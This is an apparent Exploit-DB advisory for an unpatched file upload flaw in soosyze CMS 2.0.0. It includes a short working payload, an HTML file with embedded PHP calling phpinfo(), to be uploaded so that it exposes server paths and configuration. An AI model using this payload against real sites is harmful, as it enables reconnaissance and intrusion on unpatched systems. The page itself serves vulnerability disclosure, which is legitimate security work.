soosyze 2.0.0 - File Upload

vendor:

by:

nu11secur1ty

7.5

CVSS

HIGH

File Upload

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2023

soosyze 2.0.0 – File Upload

Broken file upload logic. The malicious user can upload whatever he wants to an HTML file and when he tries to execute it he views almost all file paths. This could be worse than ever, it depends on the scenario.

Mitigation:

Source

Exploit-DB raw data:

## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload

## Description:
Broken file upload logic. The malicious user can upload whatever he
wants to an HTML file and when he tries to execute it he views almost
all
file paths. This could be worse than ever, it depends on the scenario.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<title>Hello broken file upload logic, now I can read your special
directory pats, thank you ;)</title>
</head>
<body>
<h1>
	<?php
		phpinfo();
	?>
	</h1>
</body>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)

## Time spend:
01:27:00